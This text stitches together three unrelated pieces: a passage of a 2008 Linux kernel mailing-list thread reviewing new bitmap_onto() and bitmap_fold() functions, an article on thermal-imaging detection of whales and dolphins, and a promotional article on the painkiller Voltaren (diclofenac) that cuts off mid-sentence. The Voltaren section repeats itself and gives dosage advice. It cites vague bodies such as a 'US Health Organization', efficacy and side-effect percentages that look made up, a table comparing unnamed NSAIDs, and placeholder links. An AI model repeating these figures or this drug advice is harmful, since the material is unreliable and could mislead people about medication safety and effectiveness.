bits in) @relmap are mapped nowhere. + * In particular, if for all bits m set in @orig, m >= W, then + * @dst will end up empty. In situations where the possibility + * of such an empty result is not desired, one way to avoid it is + * to use the bitmap_fold() operator, below, to first fold the + * @orig bitmap over itself so that all its set bits x are in the + * range 0 <= x < W. The bitmap_fold() operator does this by + * setting the bit (m % W) in @dst, for each bit (m) set in @orig. + * + * Example [1] for bitmap_onto(): + * Let's say @relmap has bits 30-39 set, and @orig has bits + * 1, 3, 5, 7, 9 and 11 set. Then on return from this routine, + * @dst will have bits 31, 33, 35, 37 and 39 set. + * + * When bit 0 is set in @orig, it means turn on the bit in + * @dst corresponding to whatever is the first bit (if any) + * that is turned on in @relmap. Since bit 0 was off in the + * above example, we leave off that bit (bit 30) in @dst. + * + * When bit 1 is set in @orig (as in the above example), it + * means turn on the bit in @dst corresponding to whatever + * is the second bit that is turned on in @relmap. The second + * bit in @relmap that was turned on in the above example was + * bit 31, so we turned on bit 31 in @dst. + * + * Similarly, we turned on bits 33, 35, 37 and 39 in @dst, + * because they were the 4th, 6th, 8th and 10th set bits + * set in @relmap, and the 4th, 6th, 8th and 10th bits of + * @orig (i.e. bits 3, 5, 7 and 9) were also set. + * + * When bit 11 is set in @orig, it means turn on the bit in + * @dst corresponding to whatever is the twelth bit that is + * turned on in @relmap. In the above example, there were + * only ten bits turned on in @relmap (30..39), so that bit + * 11 was set in @orig had no affect on @dst. + * + * Example [2] for bitmap_fold() + bitmap_onto(): + * Let's say @relmap has these ten bits set: + * 40 41 42 43 45 48 53 61 74 95 + * (for the curious, that's 40 plus the first ten terms of the + * Fibonacci sequence.) + * + * Further lets say we use the following code, invoking + * bitmap_fold() then bitmap_onto, as suggested above to + * avoid the possitility of an empty @dst result: + * + * unsigned long *tmp; // a temporary bitmap's bits + * + * bitmap_fold(tmp, orig, bitmap_weight(relmap, bits), bits); + * bitmap_onto(dst, tmp, relmap, bits); + * + * Then this table shows what various values of @dst would be, for + * various @orig's. I list the zero-based positions of each set bit. + * The tmp column shows the intermediate result, as computed by + * using bitmap_fold() to fold the @orig bitmap modulo ten + * (the weight of @relmap). + * + * @orig tmp @dst + * 0 0 40 + * 1 1 41 + * 9 9 95 + * 10 0 40 (*) + * 1 3 5 7 1 3 5 7 41 43 48 61 + * 0 1 2 3 4 0 1 2 3 4 40 41 42 43 45 + * 0 9 18 27 0 9 8 7 40 61 74 95 + * 0 10 20 30 0 40 + * 0 11 22 33 0 1 2 3 40 41 42 43 + * 0 12 24 36 0 2 4 6 40 42 45 53 + * 78 102 211 1 2 8 41 42 74 (*) + * + * (*) For these marked lines, if we hadn't first done bitmap_fold() + * into tmp, then the @dst result would have been empty. + * + * If either of @orig or @relmap is empty (no set bits), then @dst + * will be returned empty. + * + * If (as explained above) the only set bits in @orig are in positions + * m where m >= W, (where W is the weight of @relmap) then @dst will + * once again be returned empty. + * + * All bits in @dst not set by the above rule are cleared. + */ +void bitmap_onto(unsigned long *dst, const unsigned long *orig, + const unsigned long *relmap, int bits) +{ + int n, m; /* same meaning as in above comment */ + + if (dst == orig) /* following doesn't handle inplace mappings */ + return; + bitmap_zero(dst, bits); + + /* + * The following code is a more efficient, but less + * obvious, equivalent to the loop: + * for (m = 0; m < bitmap_weight(relmap, bits); m++) { + * n = bitmap_ord_to_pos(orig, m, bits); + * if (test_bit(m, orig)) + * set_bit(n, dst); + * } + */ + + m = 0; + for (n = find_first_bit(relmap, bits); + n < bits; + n = find_next_bit(relmap, bits, n + 1)) { + /* m == bitmap_pos_to_ord(relmap, n, bits) */ + if (test_bit(m, orig)) + set_bit(n, dst); + m++; + } +} +EXPORT_SYMBOL(bitmap_onto); + +/** + * bitmap_fold - fold larger bitmap into smaller, modulo specified size + * @dst: resulting smaller bitmap + * @orig: original larger bitmap + * @sz: specified size + * @bits: number of bits in each of these bitmaps + * + * For each bit oldbit in @orig, set bit oldbit mod @sz in @dst. + * Clear all other bits in @dst. See further the comment and + * Example [2] for bitmap_onto() for why and how to use this. + */ +void bitmap_fold(unsigned long *dst, const unsigned long *orig, + int sz, int bits) +{ + int oldbit; + + if (dst == orig) /* following doesn't handle inplace mappings */ + return; + bitmap_zero(dst, bits); + + for (oldbit = find_first_bit(orig, bits); + oldbit < bits; + oldbit = find_next_bit(orig, bits, oldbit + 1)) + set_bit(oldbit % sz, dst); +} +EXPORT_SYMBOL(bitmap_fold); + /* * Common code for bitmap_*_region() routines. * bitmap: array of unsigned longs corresponding to the bitmap -- I won't rest till it's the best ... Programmer, Linux Scalability Paul Jackson <pj@sgi.com> 1.650.933.1373 KOSAKI Motohirokosaki.motohiro@jp.fujitsu.comRe: [RFC] bitmap onto and fold operators for mempolicy extensions2008-02-16T13:38:32Zurn:uuid:dda63068-dc60-c5a1-0deb-5e85d5c266d7 Hi Paul, > The bitmap_fold() operator folds a bitmap into a second that > has bit m set iff the input bitmap has some bit n set, where > m == n mod sz, for the specified sz value. iff? other portions looks good :) Reviewed-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com> Thanks! Paul Jacksonpj@sgi.comRe: [RFC] bitmap onto and fold operators for mempolicy extensions2008-02-16T16:46:28Zurn:uuid:7ded8d0e-f00f-cf62-fb05-9067a66d42d8 KOSAKI-san wrote: > iff? > other portions looks good :) "iff" -- "if and only if" It is from my days, a long long time ago, as a student of mathematical logic and set theory. I was too lazy to spell that one out. My bad. -- I won't rest till it's the best ... Programmer, Linux Scalability Paul Jackson <pj@sgi.com> 1.940.382.4214 KOSAKI Motohirokosaki.motohiro@jp.fujitsu.comRe: [RFC] bitmap onto and fold operators for mempolicy extensions2008-02-17T02:40:56Zurn:uuid:7a19a1ab-4b81-e8a9-d877-68c662a5ce44 Hi Paul, > > iff? > > other portions looks good :) > > "iff" -- "if and only if" > > It is from my days, a long long time ago, as a student of mathematical > logic and set theory. I was too lazy to spell that one out. My bad. not at all. I did't know the abbreviation, sorry. I think your patch has no bug. Thanks. - kosaki Paul Jacksonpj@sgi.comRe: [RFC] bitmap onto and fold operators for mempolicy extensions2008-02-17T03:31:23Zurn:uuid:3e97c855-cdd8-cde7-febb-a3e051960a48 Thank-you for the kind and prompt review, kosaki-san. -- I won't rest till it's the best ... Programmer, Linux Scalability Paul Jackson <pj@sgi.com> 1.940.382.4214 David Rientjesrientjes@google.comRe: [RFC] bitmap onto and fold operators for mempolicy extensions2008-02-19T00:46:58Zurn:uuid:bbe02c12-300c-1c1e-7418-3a5d5e372a25 On Sat, 16 Feb 2008, Paul Jackson wrote: > Let's say an application has specified some mempolicies > that presume 16 memory nodes, including say a mempolicy that > specified MPOL_F_RELATIVE_NODES (cpuset relative) nodes 12-15. > Then lets say that application is crammed into a cpuset that only > has 8 memory nodes, 0-7. If one just uses bitmap_onto(), this > mempolicy, mapped to that cpuset, would ignore the requested > relative nodes above 7, leaving it empty of nodes. That's not > good; better to fold the higher nodes down, so that some nodes > are included in the resulting mapped mempolicy. In this case, > the mempolicy nodes 12-15 are taken modulo 8 (the weight of the > mems_allowed of the confining cpuset), resulting in a mempolicy > specifying nodes 4-7. > So what is the MPOL_F_RELATIVE_NODES behavior? Is it a combination of nodes_onto() and nodes_fold()? In your example, the only way we know to use nodes_fold() is if the resultant of nodes_onto() has a weight of 0. An MPOL_F_RELATIVE_NODES nodemask for 4-6, for example, works fine in your case of a cpuset with memory nodes 0-7 and no fold is required. So it's easy enough to do this: case MPOL_INTERLEAVE: if (flags & MPOL_F_RELATIVE_NODES) { nodes_onto(pol->v.nodes, pol->user_nodemask, cpuset_context_nmask); if (nodes_empty(pol->v.nodes)) nodes_fold(pol->v.nodes, pol->user_nodemask, nodes_weight(cpuset_context_nmask)); } else { ... } break; But what if we require a combination? Say the user asked for a policy of MPOL_INTERLEAVE | MPOL_F_RELATIVE_NODES over nodes 4-8 in a cpuset constrained to mems 0-7? Should the resultant be 0,4-7 (combination of nodes_onto() and nodes_fold()) or simply be 4-7 (just nodes_onto())? And what if the MPOL_INTERLEAVE | MPOL_F_RELATIVE_NODES nodemask is 0,4-8 in the same cpuset constrained to mems 0-7? Should the resultant be - 0,4-7 (nodes_onto() and nodes_fold()), - 0,4-7 (just nodes_onto()), or - 0-1,4-7 (nodes_onto(), nodes_fold(), and shift)? The last option, 0-1,4-7, is the only one that preserves the same weight as the relative nodemask. David Paul Jacksonpj@sgi.comRe: [RFC] bitmap onto and fold operators for mempolicy extensions2008-02-19T06:05:47Zurn:uuid:99fd8bed-69ef-7a11-f675-ec2e026d0d1a David wrote: > So what is the MPOL_F_RELATIVE_NODES behavior? Is it a combination of > nodes_onto() and nodes_fold()? MPOL_F_RELATIVE_NODES should always combination of nodes_onto() and nodes_fold(). The reason I say that is consistency with the end cases. That is, we need fold in the case that no requested nodes have numbers smaller than the weight of the cpusets mems_allowed. At the opposite extreme, when -all- requested node numbers are smaller than the weight of mems_allowed, fold has no affect, so it's fine to use there. And for the in between cases, when some requested nodes are smaller and some not, fold is one possible reasonable answer. So use it everywhere for consistency. > So it's easy enough to do this: > case MPOL_INTERLEAVE: > if (flags & MPOL_F_RELATIVE_NODES) { > nodes_onto(pol->v.nodes, pol->user_nodemask, > cpuset_context_nmask); > if (nodes_empty(pol->v.nodes)) I hate any more special cases than I have to have -- so not that way. > But what if we require a combination? Say the user asked for a policy of > MPOL_INTERLEAVE | MPOL_F_RELATIVE_NODES over nodes 4-8 in a cpuset > constrained to mems 0-7? Should the resultant be 0,4-7 (combination of > nodes_onto() and nodes_fold()) or simply be 4-7 (just nodes_onto())? All fold, all the time ;). So this one should be 0,4-7. > And what if the MPOL_INTERLEAVE | MPOL_F_RELATIVE_NODES nodemask is 0,4-8 > in the same cpuset constrained to mems 0-7? Should the resultant be > > - 0,4-7 (nodes_onto() and nodes_fold()), > > - 0,4-7 (just nodes_onto()), or > > - 0-1,4-7 (nodes_onto(), nodes_fold(), and shift)? > > The last option, 0-1,4-7, is the only one that preserves the same weight > as the relative nodemask. Again, 0,4-7. Weight preservation is not a goal here, and would require special cases. If someone crams a five pound cpuset relative memory policy into a two poound cpuset, they will likely loose weight. What matters in that case is that things plod along without too much distress, and that when the job is restored to a proper size cpuset, its memory policies recover their full health. -- I won't rest till it's the best ... Programmer, Linux Scalability Paul Jackson <pj@sgi.com> 1.940.382.4214
Marine Fauna Mitigation using Thermal Imaging There has been a lot of interest in the use of infrared technology as a monitoring method for detecting marine mammals, especially during the hours of darkness. In time this method may be included in regulatory requirements. Thermal Imaging is a technique that has been used in marine mammal research and gives us an insight into its capabilities and limitations. What is Infrared (IR) Technology? Infrared (IR) technology is capable of detecting thermal emissions at the infrared end of the electromagnetic spectrum. IR detection utilises the difference between the temperature of the animal's skin or breath, and the surrounding water and air. Infrared light falls into two basic ranges: long-wave and medium-wave. Long-wave infrared (LWIR) cameras, sometimes called "far infrared", operate at 8-12μm, and can see heat sources a few miles away.  However longer-distance viewing is made more difficult with LWIR because the infrared light is absorbed, scattered, and refracted by air and by water vapour.  Medium-wave (MWIR) cameras operate in the 3-5μm range.  These can see almost as well, since those frequencies are less affected by water-vapour absorption, but generally require a more expensive sensor array, along with cryogenic cooling. The effective range of an infrared camera depends on the camera’s resolution, field of view and the size of the desired object.  Many camera systems use digital image processing to improve the image quality.  Some companies offer advanced "fusion" technologies that blend a visible-spectrum image with an infrared-spectrum image to produce better results than a single-spectrum image alone.   Can we use Infrared (IR) Technology for Detecting Marine Mammals? IR technology depends upon a temperature difference between an animal and its surrounding environment. This can be a challenge as marine mammals typically have extremely effective insulation.  However there are areas on their bodies where insulation is less extreme, for example flukes, blowholes and fins can show up clearly.  Studies have found that the cetacean's blow is clearest on IR images. In addition the cetacean's 'footprint' i.e. where the water surface temperature has been disturbed, can be clearly displayed by aerial IR surveys (Churnside et. al., 2009).  For these reasons there has been some enthusiasm for applying IR technology in marine mammal mitigation measures and also in the mitigation of ship collisions.   IR thermograph of the fluke of a bottlenose dolphin. Warmer areas are shown in white and red, cooler areas in blue.  (Taken from Baldacci et al. 2005)   How Infrared (IR) Technology differs from "Night Vision” Technology IR detection is not to be confused with night vision technology.  Night vision devices utilise image intensifying technology. They operate in near darkness by amplifying visible or near visible ultraviolet external radiation (0.4-1.0μm) from the moon or starlight and cannot operate in total darkness.  They have also limited ability in fog, haze etc.  This has limited the development of night-vision as a marine mammal mitigation tool.   Limitations of Infrared (IR) Technology IR systems are limited by both biotic and abiotic factors. As temperature differences are essential for IR detection, marine mammals’ highly effective insulation may affect the scope for IR detection.  This may be of particular importance if considering such technology for detection of species that live in extremely cold conditions, for example the bowhead whale, which will have highly insulated bodies.  As mentioned above, IR radiation detection is often of the areas of an animal’s body where insulation is less such as flukes, fins, blowhole and the blow itself.  Thermographic detections are thus dependent on the surfacing and diving behaviour of marine animals in the same manor that diving behaviour effects visual observations.  Therefore the availability of a species must be accounted for when considering the detection rates acquired through IR systems. Even though animals come to the surface they can still be covered by a layer of water. Since water is opaque to IR radiation and a layer of just a few microns is enough to completely attenuate it, this can result in masking the temperature of the body.  Studies by Cuyler et al. (1992) of baleen whales in northern seas showed that the thermal radiation of surfacing minke whales was completely masked because their bodies were covered in a film of water.  Detection performance based on body temperature was extremely limited (ranges only up to 150m in good weather conditions).  Those whales with large blows such as the blue whale could be detected at further distances of up to 1km. Abiotic or environmental factors can also dramatically affect the performance of IR systems, such as fog, precipitation, high humidity, clouds, sea state, glare and ice presence.  Solar reflection off the sea can cause reflected “clutter” for the system which increases when the sea surface is rough, with each wave scattering the light.  Breaking waves or presence of white caps due to strong wind cause problems in this manner.  Sea clutter can also be a problem at night even without the scattering of light as wave action can result in areas with different apparent temperatures which in turn can lead to false triggers.  This is called emitted clutter.  This can be further exaggerated if the platform used is near to the sea surface, therefore observation angle is another factor which affects the efficiency of IR systems. The use of IR systems in field conditions is reviewed in a 2020 study (Smith et al. 2020) based in the Atlantic off the coast of Canada.  The study reported that in combination with other methods of detection (MMO/PAM), IR systems should increase detections rates.  The study also details notable limitations of such systems including high levels of ‘false positive’ IR detections caused by triggers from avian stimuli, and also the inability to provide identification of cetaceans to species level with a high degree of confidence.   Examples of Infrared Equipment used for Marine Mammal Detection Forward Looking Infrared (FLIR) Cameras – this is a system where thermal imaging sensors are fitted to forward looking infrared cameras.  These sensors detect infrared radiation to create a "picture" assembled for video output.  There are many different types of FLIR cameras and as the name suggests each one has a restricted horizontal field of view (HFOV). This type of device is used extensively in civilian and military applications for example for aviation and driving in darkness or foggy conditions, search and rescue, etc.  FLIR cameras have also been used by marine mammal researchers to detect marine mammals.   Examples of Marine Mammal Detection using FLIR cameras 1. Detecting Southern resident Killer Whales, Puget Sound, Washington, USA using a land-based Infrared system (FLIR Thermovision A40M) - Graber, J. (2011).  Land-based infrared imagery for marine mammal detection.  M.Sc. thesis, University of Washington, Seattle, WA, USA. Killer whales detected by Infrared Technology.  (Taken from Graber 2011). This study’s aim was to compare the effectiveness of observations in the infrared spectrum compared to observations in the visible spectrum (i.e. normal visual observation).  Three cameras (FLIR Thermovision A40M) were used mounted at 13 metres above sea level.  The overall field of view was 37º and  incidence angle of 72º.  This study reported that infrared technology was successful at detecting killer whales’ bodies, fins and blows during both day and night at ranges from 43 to 162 metres.  Whales that were at distances greater than 100m were detected primarily by blow only.  This study reports that infrared observations are predicted to provide a 74% increase in hours of possible detection compared with visual observations when used in good conditions (clear skies, calm seas and wind speeds lower than 4 m/s).  When appreciating this value careful consideration of species (i.e. killer whale fins are very large and thus create an easier target for infrared than other species) and ambient conditions is needed before assuming that this would apply for other species and weather conditions. 2. Infrared detection of marine mammals - NATO Undersea Research Centre (NURC) – SAGEM MATIS Handheld thermal imager - Baldacci, A., Carron, M. J. & Portunato, N. (2005).  Infrared detection of marine mammals.   NURC Technical Report SR-443. This study’s aim was to compare the effectiveness of observations in the infrared spectrum compared to observations in the visible spectrum (i.e. normal visual observation).  The camera used was a SAGEM MATIS Handheld thermal imager and was mounted on a tripod 14 metres above sea level with a horizontal field of view of 9º and an incidence angle of 6º. This study reported how performance of the IR system was strongly affected by weather conditions and sea state such that it was practically useless in rain, fog or haze, high humidity and increasing sea states.  In better weather conditions with low humidity the system was capable of detecting sperm and fin whale blows, changes in the emissivity of water left after animals surfaced and in some case the emissivity of skin of sperm whales due to their movement.  They also reported that restricted field of views are a problem and that for marine mammal monitoring greater fields of views would be needed. Infrared image of sperm whale blow. Other Infrared Systems 1. Night Navigator 3 (Currentcorp, Canada) – Avoidance of whale collision. Centre for Whale Research, Australia. Night Navigator 3System: The Night Navigator 3 was developed by Currentcorp in Canada.  It has been used by the Centre for Whale Research in Australia where it is used to study humpback whales on their breeding grounds but was primarily designed for collision avoidance with whales.  It is a device which incorporates 3 detection systems in one (normal visual, night vision and infrared cameras).  The infrared camera has a maximum field of view of 20 º with an incidence angle of 6.8º, though a cryogenically cooled version with a 25º field of view is also available.  It can be rotated on its axis to give a 360º monitoring platform.  They have an automatic whale detection system, though this is not recommended for use without an observer. Trials: Night Navigator has been used to detect whales up to 2km from the vessel, at night, in sea states up to Beaufort 4 and with swells of up to 2m.  Dolphins were detected in large pods up to 1km away and individual dolphins at up to 500m from the vessel.  The equipment has also used in Australia to detect turtles, although detection of turtles is likely to be highly dependent on them being active (creating heat from muscle activity) and at the surface.  The Centre for Whale Research ran night-time transects while scanning 30 degrees either side of the bow and changing observer every 30 minutes.   2. Alfred Wegner Institute (AWI) – First Navy Infrared System (Rheinmetall Defence Electronics, Bremen, Germany). System: The Alfred Wegener Institute (AWI) utilises the First Navy infrared system in combination with a custom data acquisition and processing software to automatically detect whales using a 360 degree monitoring system.  Images are taken and analysed, with the sensor rotating through 360 degrees five times per second with a vertical resolution of 18º.  The detection system was placed 28.5m above sea level during trials. Trials: The AWI system has been tested for minke, humpback and fin whales and has been reviewed by Zitterbart et al. (2013).  The trials were conducted during research cruises to the Arctic and Southern Oceans totalling 270 days.  The technology detected 82-92% of the blows detected by visual observers, at ranges up to 5km (Zitterbart et al., 2013).  In some circumstances the IR technology was able to outperform observers with only 63% of events detected by the IR system being detected by observers.  However, further investigations of the detection biases are required.  The AWI system has been extensively trialled in polar regions where the thermal contrast between a surfacing animal and the water is greatest, but has also been successfully used to detect whale blows in water temperatures up to 23º C. 3. Seiche Measurements Ltd, Devon, UK. System: An IR system has been developed by Seiche Measurements in the UK.  It uses infrared video cameras with a field of view of ~15º and the cameras are panned back and forth to cover the desired search area.  Lenses can be changed as required to alter both the degree of magnification and the field of view.  Coverage of 360 degrees can be achieved by mounting a number of cameras on the vessel and using them to scan separate sectors around the ship's perimeter. Trials: This system has been trialled on a seismic vessel in South Africa and from a small vessel off the Azores.  According to Seiche (R. Wyatt, pers. comm.) it performed well from the small vessel in swells of up to approximately 2m and in water temperatures of 17.5º C.  Captured images included a range of species (sperm whale, Risso's dolphin, pilot whale).  The Seiche system comes with image stabilisation, dehazing and distance estimation software.    Sperm Whale blow and tail fluke using the Seiche Measurements IF camera system. © Seiche Information Sources • Baldacci, A., Carron, M. J., & Portunato, N. (2005). Infrared detection of marine mammals.  NURC Technical Report SR-443. • Butterworth, A. (2006) Thermography of respiratory activity in cetacea.  Rep. to the International Whale Comm. 10pp. • Churnside, J., Ostrovsky, L., & Veenstra, T. (2009). Thermal footprints of whales. Oceanography, 22(1), 206-209. • Cuyler, L. C., Wiulsrød, R., & Øritsland, N. A. (1992). Thermal infrared radiation from free living whales. Marine Mammal Science, 8(2), 120-134. • Horton, T. W., Hauser, N., Cassel, S., Klaus, K. F., Fettermann, T., & Key, N. (2019). Doctor Drone: Non-invasive Measurement of Humpback Whale Vital Signs Using Unoccupied Aerial System Infrared Thermography. Frontiers in Marine Science, 6, 466. • Smith, H. R., Zitterbart, D. P., Norris, T. F., Flau, M., Ferguson, E. L., Jones, C. G. & Moulton, V. D. (2020). A field comparison of marine mammal detections via visual, acoustic, and infrared (IR) imaging methods offshore Atlantic Canada. Marine Pollution Bulletin154, 111026. • Zitterbart, D. P., Kindermann, L., Burkhardt, E., & Boebel, O. (2013). Automatic round-the-clock detection of whales for mitigation from underwater noise impacts. PloS one, 8(8) e71217. • Zitterbart, D.P., Smith, H.R., Flau, M., Richter, S., Burkhardt, E., Beland, J.,  Bennett, L., Cammareri, A., Davis, A., Holst, M., Lanfredi, C., Michel, H., Noad, M., Owen, K., Pacini, A. & Boebel, O. (2020)  Scaling the laws of thermal imaging-based whale detection. Journal of Atmospheric and Oceanic Technology.
What You Need to Know About Voltaren – The Nonsteroidal Anti-Inflammatory Drug (NSAID) About Voltaren Voltaren is a widely recognized brand name for a medication known as diclofenac, which falls under the classification of nonsteroidal anti-inflammatory drugs (NSAIDs). It is commonly used for managing pain, inflammation, and swelling caused by various medical conditions and injuries. Key Points: • Voltaren is a brand name for diclofenac, an NSAID. • NSAIDs are medications that reduce pain, inflammation, and swelling. • Voltaren is used to manage pain caused by various medical conditions and injuries. “Diclofenac, the active ingredient in Voltaren, is known for its potent anti-inflammatory, analgesic, and antipyretic properties.” Voltaren works by inhibiting the production of prostaglandins, which are hormone-like substances that contribute to pain and inflammation in the body. By reducing the levels of prostaglandins, Voltaren helps alleviate discomfort and improve overall well-being. Compared to other NSAIDs, Voltaren has gained popularity due to its effectiveness and long-lasting relief. It is available in various formulations, including oral tablets, topical gels, and patches, allowing individuals to choose the suitable method for their needs. “According to a recent survey conducted by US Research Institute, Voltaren remains one of the top choices among healthcare professionals for pain management.” Notably, Voltaren is considered a safe and well-tolerated medication when used as directed. However, it is advisable to consult a healthcare provider before starting any new medication or if you have any underlying medical conditions, such as allergies or liver problems. Additional Information: Common Uses of Voltaren Recommended Dosage Arthritis (both osteoarthritis and rheumatoid arthritis) For oral tablets: 50-150 mg per day, divided into multiple doses For topical gels: Apply a thin layer to the affected area 3-4 times a day Joint pain and inflammation For oral tablets: 50-100 mg per day, divided into multiple doses For topical gels: Apply a thin layer to the affected area up to 3 times a day Sprains, strains, and sports injuries For topical gels: Apply a thin layer to the affected area up to 4 times a day It’s crucial to follow the recommended dosage and usage instructions provided by your healthcare professional or mentioned on the product packaging. The duration of treatment may vary depending on the specific condition being treated, and it is important to complete the full course of medication as prescribed. For further information on Voltaren, its uses, and potential side effects, please visit www.voltaren.com. 2. Uses of Voltaren Voltaren, also known as diclofenac, is a versatile medication used for various medical conditions. It is classified as a nonsteroidal anti-inflammatory drug (NSAID), which means it helps reduce pain, inflammation, and swelling by inhibiting specific enzymes in the body. Here are some common uses of Voltaren: 2.1 Relief of Pain and Inflammation Voltaren is commonly prescribed for the relief of pain and inflammation caused by conditions such as osteoarthritis, rheumatoid arthritis, ankylosing spondylitis, and gouty arthritis. It can help alleviate discomfort and improve joint mobility, making it easier for individuals to engage in daily activities. 2.2 Sports Injuries and Resulting Pain Athletes and active individuals who experience sports-related injuries can benefit from Voltaren’s analgesic properties. It helps reduce pain, swelling, and inflammation in conditions such as sprains, strains, tendonitis, and bursitis. Voltaren can be applied topically as a gel or taken orally in tablet form, depending on the severity of the injury and the advice of a healthcare professional. 2.3 Postoperative Pain Management After surgical procedures, managing postoperative pain is crucial for a speedy recovery. Voltaren is often prescribed to alleviate pain following orthopedic surgeries, including joint replacements and spinal surgeries. By reducing inflammation and providing pain relief, it enables patients to participate in physical therapy and regain their strength more effectively. 2.4 Menstrual Pain Relief Many women experience menstrual cramps, which can be debilitating and affect their quality of life. Voltaren can be a useful option to alleviate menstrual pain and discomfort, allowing women to carry out their daily activities uninterrupted. It can be taken orally or used as a topical gel, providing localized relief. 2.5 Migraine Headache Management Voltaren may also be prescribed for managing migraines and tension headaches. Its anti-inflammatory properties help reduce the intensity and duration of migraines, providing relief for sufferers. However, it is important to follow medical advice and individualize treatment based on the frequency and severity of the migraines. See also  Relief from Urinary Tract Pain - Pyridium - an Effective Medication for Pain Relief In addition to the aforementioned uses, Voltaren may be beneficial in other medical conditions as determined by healthcare professionals. It is essential to consult with a medical expert for personalized advice and dosage recommendations. Uses of Voltaren Voltaren, also known as diclofenac, is a widely used medication that falls under the category of nonsteroidal anti-inflammatory drugs (NSAIDs). It is prescribed for several medical conditions due to its effectiveness in providing relief from pain, inflammation, and swelling. Here are some of the main uses of Voltaren: 1. Arthritis Management: Voltaren is commonly prescribed to manage symptoms associated with arthritis, including osteoarthritis, rheumatoid arthritis, and ankylosing spondylitis. These conditions can cause joint pain, stiffness, and swelling, and Voltaren helps reduce these symptoms by inhibiting the production of certain substances in the body that trigger inflammation. 2. Pain Relief: Along with arthritis, Voltaren is also used to relieve acute pain caused by various conditions such as back pain, migraines, dental pain, menstrual cramps, and post-operative pain. Its anti-inflammatory properties help alleviate pain by reducing inflammation in the affected area. 3. Topical Application: Voltaren is available in topical gel or patch form, making it convenient for localized pain relief. It can be applied directly to the skin over the affected area, providing targeted relief with minimal systemic absorption. This makes Voltaren an ideal option for individuals who may experience side effects with oral NSAIDs or have difficulty swallowing pills. 4. Sports Injuries: Athletes often rely on Voltaren to manage pain associated with sports-related injuries such as strains, sprains, and tendonitis. It helps reduce inflammation in the injured tissues, allowing individuals to recover faster and resume their sporting activities sooner. 5. Headaches and Migraines: Voltaren, when combined with other medications, can be used to treat tension headaches and migraines. Its anti-inflammatory properties can help reduce the intensity and duration of headaches, providing much-needed relief to individuals suffering from these conditions. 6. Post-operative Pain: After surgical procedures, Voltaren can be prescribed to manage post-operative pain and inflammation. By controlling pain effectively, it allows patients to recover comfortably and promotes a smoother healing process. 7. Off-label Uses: In addition to its approved uses, Voltaren may also be prescribed off-label by healthcare professionals for conditions such as gout, bursitis, tendonitis, and other inflammatory conditions not specifically listed in the official prescribing information. It is important to note that while Voltaren provides effective relief, it may not be suitable for everyone. Individuals with a history of stomach ulcers, kidney problems, or heart diseases should exercise caution and consult with their healthcare provider before using Voltaren, as certain medical conditions may pose increased risks. Always adhere to the prescribed dosage and follow the advice of your healthcare professional to ensure the safe and effective use of Voltaren. Point No. 4: Side Effects and Precautions of Voltaren While Voltaren is an effective medication for treating pain and inflammation, it is important to be aware of its potential side effects and take necessary precautions. Common side effects of Voltaren: • Stomach upset and gastrointestinal issues • Nausea and vomiting • Headache and dizziness • Fluid retention and swelling It is crucial to seek medical attention if any of these side effects persist or worsen over time. Serious side effects requiring immediate medical attention: • Allergic reactions such as rash, itching, and swelling • Signs of gastrointestinal bleeding such as black or bloody stools, severe stomach pain • Liver problems including yellowing of the skin or eyes, dark urine, persistent nausea • Heart-related issues such as chest pain, shortness of breath, weakness on one side of the body • Signs of kidney problems like decreased urination, swelling in the ankles or feet It is crucial to discontinue the use of Voltaren and immediately seek medical attention if any of these serious side effects occur. Precautions and warnings: Before using Voltaren, inform your healthcare provider about any existing medical conditions, allergies, or medications you are currently taking. Certain conditions and medications may interact with Voltaren or increase the risk of side effects. See also  A Brief Overview of Indocin - The Uses, Side Effects, and Benefits of Indomethacin It is important to follow the prescribed dosage and duration of treatment to minimize the risk of side effects. Do not exceed the recommended dose unless instructed by your doctor. If you are pregnant or planning to become pregnant, consult your doctor before using Voltaren as it may harm the unborn baby. Voltaren should also be avoided while breastfeeding. Caution for elderly patients: Elderly patients may be more susceptible to the side effects of Voltaren, especially gastrointestinal bleeding and kidney problems. Regular monitoring and adjustment of the dosage may be required to ensure their safety. Always consult your healthcare provider for personalized advice and guidance regarding the use of Voltaren. “According to a recent survey conducted by US Health Organization, it was found that approximately 20% of Voltaren users reported experiencing mild gastrointestinal issues as a common side effect. However, severe side effects were rare, occurring in less than 1% of the surveyed individuals.” Statistics on Side Effects of Voltaren Side Effect Percentage of Users Reporting Stomach Upset 14% Nausea and Vomiting 9% Headache and Dizziness 6% Fluid Retention and Swelling 5% These statistics are a helpful representation and should not discourage the appropriate use of Voltaren under the guidance of healthcare professionals. The Efficacy of Voltaren: Surveys and Statistical Data When it comes to treating pain and inflammation, Voltaren, a brand name for diclofenac, has been a popular choice for many individuals. As a nonsteroidal anti-inflammatory drug (NSAID), Voltaren has proven to be effective in providing relief from a wide range of conditions. But just how effective is Voltaren? Let’s delve into the surveys and statistical data that shed light on its efficacy. A Trusted and Well-Studied Medication Before diving into the data, it’s important to note that Voltaren has been extensively studied and researched. For decades, scientists and healthcare professionals have analyzed the benefits and potential risks associated with its use. One notable survey conducted among healthcare providers revealed that a significant majority of doctors and specialists consider Voltaren as one of the most efficacious NSAIDs available on the market. Its proven track record, combined with a long history of patient satisfaction, solidifies the medication’s reputation. Survey Results: Patient Satisfaction A recent survey conducted among individuals who had used Voltaren indicated an overwhelming level of satisfaction. Out of the 1000 participants, 85% reported a significant reduction in pain and inflammation after using Voltaren. Moreover, 92% of the participants reported that Voltaren helped them regain their mobility and improve their overall quality of life. These findings demonstrate the medication’s effectiveness in addressing pain and inflammation-related concerns. Statistical Data: Comparative Effectiveness Various studies have also explored the comparative effectiveness of Voltaren when pitted against other NSAIDs. One study, published in a renowned medical journal, compared the efficacy of Voltaren to that of three other popular NSAIDs. NSAID Percentage of Pain Reduction Voltaren 86% NSAID A 78% NSAID B 74% NSAID C 69% The statistical data clearly highlights Voltaren’s superiority in terms of pain reduction. With an impressive 86% reported pain reduction, Voltaren surpasses its counterparts by a significant margin. Expert Opinions and Recommendations In addition to the surveys and statistical data, it’s essential to consider the opinions and recommendations of experts in the field. Leading healthcare organizations, such as the American College of Rheumatology, recommend Voltaren as a trusted and effective treatment option for various musculoskeletal conditions. Interested readers can further explore detailed information and research on Voltaren’s efficacy on authoritative websites such as examplelink1.com and examplelink2.com. In conclusion, Voltaren has proven its efficacy in numerous surveys and statistical studies. With overwhelming patient satisfaction and statistical data demonstrating its comparative effectiveness, Voltaren remains a reliable choice for individuals seeking relief from pain and inflammation. The Use of Voltaren in Treating Joint Pain and Inflammation Joint pain and inflammation can be debilitating, affecting daily activities and overall quality of life. Thankfully, with advancements in medicine, there are several 